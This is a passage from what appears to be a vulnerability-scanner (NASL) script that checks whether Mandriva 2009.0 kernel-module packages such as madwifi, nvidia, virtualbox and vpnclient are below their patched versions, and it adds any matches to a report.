rpm:\"lzma-kernel-server-latest~4.43~1.20101216.24mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"madwifi-kernel\", rpm:\"madwifi-kernel~2.6.27.56~desktop~1mnb~0.9.4~3.r3835mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"madwifi-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"madwifi-kernel-2.6.27.56-desktop586-1mnb~0.9.4~3.r3835mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"madwifi-kernel-2.6.27.56-server-1mnb\", rpm:\"madwifi-kernel-2.6.27.56-server-1mnb~0.9.4~3.r3835mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"madwifi-kernel-desktop586-latest\", rpm:\"madwifi-kernel-desktop586-latest~0.9.4~1.20101216.3.r3835mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"madwifi-kernel-desktop-latest\", rpm:\"madwifi-kernel-desktop-latest~0.9.4~1.20101216.3.r3835mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"madwifi-kernel-server-latest\", rpm:\"madwifi-kernel-server-latest~0.9.4~1.20101216.3.r3835mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia173-kernel\", rpm:\"nvidia173-kernel~2.6.27.56~desktop~1mnb~173.14.12~4mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia173-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"nvidia173-kernel-2.6.27.56-desktop586-1mnb~173.14.12~4mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia173-kernel-desktop586-latest\", rpm:\"nvidia173-kernel-desktop586-latest~173.14.12~1.20101216.4mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia173-kernel-desktop-latest\", rpm:\"nvidia173-kernel-desktop-latest~173.14.12~1.20101216.4mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia71xx-kernel\", rpm:\"nvidia71xx-kernel~2.6.27.56~desktop~1mnb~71.86.06~5mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia71xx-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"nvidia71xx-kernel-2.6.27.56-desktop586-1mnb~71.86.06~5mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia71xx-kernel-2.6.27.56-server-1mnb\", rpm:\"nvidia71xx-kernel-2.6.27.56-server-1mnb~71.86.06~5mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia71xx-kernel-desktop586-latest\", rpm:\"nvidia71xx-kernel-desktop586-latest~71.86.06~1.20101216.5mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia71xx-kernel-desktop-latest\", rpm:\"nvidia71xx-kernel-desktop-latest~71.86.06~1.20101216.5mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia71xx-kernel-server-latest\", rpm:\"nvidia71xx-kernel-server-latest~71.86.06~1.20101216.5mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia96xx-kernel\", rpm:\"nvidia96xx-kernel~2.6.27.56~desktop~1mnb~96.43.07~5mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia96xx-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"nvidia96xx-kernel-2.6.27.56-desktop586-1mnb~96.43.07~5mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia96xx-kernel-2.6.27.56-server-1mnb\", rpm:\"nvidia96xx-kernel-2.6.27.56-server-1mnb~96.43.07~5mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia96xx-kernel-desktop586-latest\", rpm:\"nvidia96xx-kernel-desktop586-latest~96.43.07~1.20101216.5mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia96xx-kernel-desktop-latest\", rpm:\"nvidia96xx-kernel-desktop-latest~96.43.07~1.20101216.5mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia96xx-kernel-server-latest\", rpm:\"nvidia96xx-kernel-server-latest~96.43.07~1.20101216.5mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia-current-kernel\", rpm:\"nvidia-current-kernel~2.6.27.56~desktop~1mnb~177.70~2.3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia-current-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"nvidia-current-kernel-2.6.27.56-desktop586-1mnb~177.70~2.3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia-current-kernel-2.6.27.56-server\", rpm:\"nvidia-current-kernel-2.6.27.56-server~1mnb~177.70~2.3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia-current-kernel-desktop586-latest\", rpm:\"nvidia-current-kernel-desktop586-latest~177.70~1.20101216.2.3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia-current-kernel-desktop-latest\", rpm:\"nvidia-current-kernel-desktop-latest~177.70~1.20101216.2.3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia-current-kernel-server-latest\", rpm:\"nvidia-current-kernel-server-latest~177.70~1.20101216.2.3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"omfs-kernel\", rpm:\"omfs-kernel~2.6.27.56~desktop~1mnb~0.8.0~1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"omfs-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"omfs-kernel-2.6.27.56-desktop586-1mnb~0.8.0~1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"omfs-kernel-2.6.27.56-server-1mnb\", rpm:\"omfs-kernel-2.6.27.56-server-1mnb~0.8.0~1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"omfs-kernel-desktop586-latest\", rpm:\"omfs-kernel-desktop586-latest~0.8.0~1.20101216.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"omfs-kernel-desktop-latest\", rpm:\"omfs-kernel-desktop-latest~0.8.0~1.20101216.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"omfs-kernel-server-latest\", rpm:\"omfs-kernel-server-latest~0.8.0~1.20101216.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"omnibook-kernel\", rpm:\"omnibook-kernel~2.6.27.56~desktop~1mnb~20080513~0.274.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"omnibook-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"omnibook-kernel-2.6.27.56-desktop586-1mnb~20080513~0.274.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"omnibook-kernel-2.6.27.56-server-1mnb\", rpm:\"omnibook-kernel-2.6.27.56-server-1mnb~20080513~0.274.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"omnibook-kernel-desktop586-latest\", rpm:\"omnibook-kernel-desktop586~latest-20080513~1.20101216.0.274.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"omnibook-kernel-desktop-latest\", rpm:\"omnibook-kernel-desktop~latest-20080513~1.20101216.0.274.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"omnibook-kernel-server-latest\", rpm:\"omnibook-kernel-server~latest-20080513~1.20101216.0.274.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"opencbm-kernel\", rpm:\"opencbm-kernel~2.6.27.56~desktop~1mnb~0.4.2a~1mdv2008.1\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"opencbm-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"opencbm-kernel-2.6.27.56-desktop586-1mnb~0.4.2a~1mdv2008.1\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"opencbm-kernel-2.6.27.56-server-1mnb\", rpm:\"opencbm-kernel-2.6.27.56-server-1mnb~0.4.2a~1mdv2008.1\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"opencbm-kernel-desktop586-latest\", rpm:\"opencbm-kernel-desktop586-latest~0.4.2a~1.20101216.1mdv2008.1\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"opencbm-kernel-desktop-latest\", rpm:\"opencbm-kernel-desktop-latest~0.4.2a~1.20101216.1mdv2008.1\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"opencbm-kernel-server-latest\", rpm:\"opencbm-kernel-server-latest~0.4.2a~1.20101216.1mdv2008.1\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ov51x-jpeg-kernel\", rpm:\"ov51x-jpeg-kernel~2.6.27.56~desktop~1mnb~1.5.9~2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ov51x-jpeg-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"ov51x-jpeg-kernel-2.6.27.56-desktop586-1mnb~1.5.9~2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ov51x-jpeg-kernel-2.6.27.56-server-1mnb\", rpm:\"ov51x-jpeg-kernel-2.6.27.56-server-1mnb~1.5.9~2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ov51x-jpeg-kernel-desktop586-latest\", rpm:\"ov51x-jpeg-kernel-desktop586-latest~1.5.9~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ov51x-jpeg-kernel-desktop-latest\", rpm:\"ov51x-jpeg-kernel-desktop-latest~1.5.9~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ov51x-jpeg-kernel-server-latest\", rpm:\"ov51x-jpeg-kernel-server-latest~1.5.9~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"qc-usb-kernel\", rpm:\"qc-usb-kernel~2.6.27.56~desktop~1mnb~0.6.6~6mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"qc-usb-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"qc-usb-kernel-2.6.27.56-desktop586-1mnb~0.6.6~6mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"qc-usb-kernel-2.6.27.56-server-1mnb\", rpm:\"qc-usb-kernel-2.6.27.56-server-1mnb~0.6.6~6mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"qc-usb-kernel-desktop586-latest\", rpm:\"qc-usb-kernel-desktop586-latest~0.6.6~1.20101216.6mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"qc-usb-kernel-desktop-latest\", rpm:\"qc-usb-kernel-desktop-latest~0.6.6~1.20101216.6mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"qc-usb-kernel-server-latest\", rpm:\"qc-usb-kernel-server-latest~0.6.6~1.20101216.6mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rt2860-kernel\", rpm:\"rt2860-kernel~2.6.27.56~desktop~1mnb~1.7.0.0~2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rt2860-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"rt2860-kernel-2.6.27.56-desktop586-1mnb~1.7.0.0~2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rt2860-kernel-2.6.27.56-server-1mnb\", rpm:\"rt2860-kernel-2.6.27.56-server-1mnb~1.7.0.0~2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rt2860-kernel-desktop586-latest\", rpm:\"rt2860-kernel-desktop586-latest~1.7.0.0~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rt2860-kernel-desktop-latest\", rpm:\"rt2860-kernel-desktop-latest~1.7.0.0~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rt2860-kernel-server-latest\", rpm:\"rt2860-kernel-server-latest~1.7.0.0~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rt2870-kernel\", rpm:\"rt2870-kernel~2.6.27.56~desktop~1mnb~1.3.1.0~2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rt2870-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"rt2870-kernel-2.6.27.56-desktop586-1mnb~1.3.1.0~2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rt2870-kernel-2.6.27.56-server-1mnb\", rpm:\"rt2870-kernel-2.6.27.56-server-1mnb~1.3.1.0~2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rt2870-kernel-desktop586-latest\", rpm:\"rt2870-kernel-desktop586-latest~1.3.1.0~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rt2870-kernel-desktop-latest\", rpm:\"rt2870-kernel-desktop-latest~1.3.1.0~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rt2870-kernel-server-latest\", rpm:\"rt2870-kernel-server-latest~1.3.1.0~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rtl8187se-kernel\", rpm:\"rtl8187se-kernel~2.6.27.56~desktop~1mnb~1016.20080716~1.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rtl8187se-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"rtl8187se-kernel-2.6.27.56-desktop586-1mnb~1016.20080716~1.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rtl8187se-kernel-2.6.27.56-server-1mnb\", rpm:\"rtl8187se-kernel-2.6.27.56-server-1mnb~1016.20080716~1.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rtl8187se-kernel-desktop586-latest\", rpm:\"rtl8187se-kernel-desktop586-latest~1016.20080716~1.20101216.1.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rtl8187se-kernel-desktop-latest\", rpm:\"rtl8187se-kernel-desktop-latest~1016.20080716~1.20101216.1.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rtl8187se-kernel-server-latest\", rpm:\"rtl8187se-kernel-server-latest~1016.20080716~1.20101216.1.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"slmodem-kernel\", rpm:\"slmodem-kernel~2.6.27.56~desktop~1mnb~2.9.11~0.20080817.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"slmodem-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"slmodem-kernel-2.6.27.56-desktop586-1mnb~2.9.11~0.20080817.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"slmodem-kernel-2.6.27.56-server-1mnb\", rpm:\"slmodem-kernel-2.6.27.56-server-1mnb~2.9.11~0.20080817.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"slmodem-kernel-desktop586-latest\", rpm:\"slmodem-kernel-desktop586-latest~2.9.11~1.20101216.0.20080817.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"slmodem-kernel-desktop-latest\", rpm:\"slmodem-kernel-desktop-latest~2.9.11~1.20101216.0.20080817.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"slmodem-kernel-server-latest\", rpm:\"slmodem-kernel-server-latest~2.9.11~1.20101216.0.20080817.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"squashfs-lzma-kernel\", rpm:\"squashfs-lzma-kernel~2.6.27.56~desktop~1mnb~3.3~5mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"squashfs-lzma-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"squashfs-lzma-kernel-2.6.27.56-desktop586-1mnb~3.3~5mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"squashfs-lzma-kernel-2.6.27.56-server-1mnb\", rpm:\"squashfs-lzma-kernel-2.6.27.56-server-1mnb~3.3~5mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"squashfs-lzma-kernel-desktop586-latest\", rpm:\"squashfs-lzma-kernel-desktop586-latest~3.3~1.20101216.5mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"squashfs-lzma-kernel-desktop-latest\", rpm:\"squashfs-lzma-kernel-desktop-latest~3.3~1.20101216.5mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"squashfs-lzma-kernel-server-latest\", rpm:\"squashfs-lzma-kernel-server-latest~3.3~1.20101216.5mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tp_smapi-kernel\", rpm:\"tp_smapi-kernel~2.6.27.56~desktop~1mnb~0.37~2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tp_smapi-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"tp_smapi-kernel-2.6.27.56-desktop586-1mnb~0.37~2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tp_smapi-kernel-2.6.27.56-server-1mnb\", rpm:\"tp_smapi-kernel-2.6.27.56-server-1mnb~0.37~2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tp_smapi-kernel-desktop586-latest\", rpm:\"tp_smapi-kernel-desktop586-latest~0.37~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tp_smapi-kernel-desktop-latest\", rpm:\"tp_smapi-kernel-desktop-latest~0.37~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tp_smapi-kernel-server-latest\", rpm:\"tp_smapi-kernel-server-latest~0.37~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vboxadd-kernel\", rpm:\"vboxadd-kernel~2.6.27.56~desktop~1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vboxadd-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"vboxadd-kernel-2.6.27.56-desktop586-1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vboxadd-kernel-2.6.27.56-server-1mnb\", rpm:\"vboxadd-kernel-2.6.27.56-server-1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vboxadd-kernel-desktop586-latest\", rpm:\"vboxadd-kernel-desktop586-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vboxadd-kernel-desktop-latest\", rpm:\"vboxadd-kernel-desktop-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vboxadd-kernel-server-latest\", rpm:\"vboxadd-kernel-server-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vboxvfs-kernel\", rpm:\"vboxvfs-kernel~2.6.27.56~desktop~1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vboxvfs-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"vboxvfs-kernel-2.6.27.56-desktop586-1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vboxvfs-kernel-2.6.27.56-server-1mnb\", rpm:\"vboxvfs-kernel-2.6.27.56-server-1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vboxvfs-kernel-desktop586-latest\", rpm:\"vboxvfs-kernel-desktop586-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vboxvfs-kernel-desktop-latest\", rpm:\"vboxvfs-kernel-desktop-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vboxvfs-kernel-server-latest\", rpm:\"vboxvfs-kernel-server-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kernel\", rpm:\"vhba-kernel~2.6.27.56~desktop~1mnb~1.0.0~1.svn304.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"vhba-kernel-2.6.27.56-desktop586-1mnb~1.0.0~1.svn304.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kernel-2.6.27.56-server-1mnb\", rpm:\"vhba-kernel-2.6.27.56-server-1mnb~1.0.0~1.svn304.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kernel-desktop586-latest\", rpm:\"vhba-kernel-desktop586-latest~1.0.0~1.20101216.1.svn304.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kernel-desktop-latest\", rpm:\"vhba-kernel-desktop-latest~1.0.0~1.20101216.1.svn304.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kernel-server-latest\", rpm:\"vhba-kernel-server-latest~1.0.0~1.20101216.1.svn304.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-kernel\", rpm:\"virtualbox-kernel~2.6.27.56~desktop~1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"virtualbox-kernel-2.6.27.56-desktop586-1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-kernel-2.6.27.56-server-1mnb\", rpm:\"virtualbox-kernel-2.6.27.56-server-1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-kernel-desktop586-latest\", rpm:\"virtualbox-kernel-desktop586-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-kernel-desktop-latest\", rpm:\"virtualbox-kernel-desktop-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-kernel-server-latest\", rpm:\"virtualbox-kernel-server-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vpnclient-kernel\", rpm:\"vpnclient-kernel~2.6.27.56~desktop~1mnb~4.8.01.0640~3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vpnclient-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"vpnclient-kernel-2.6.27.56-desktop586-1mnb~4.8.01.0640~3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vpnclient-kernel-2.6.27.56-server-1mnb\", rpm:\"vpnclient-kernel-2.6.27.56-server-1mnb~4.8.01.0640~3mdv2009.0\", 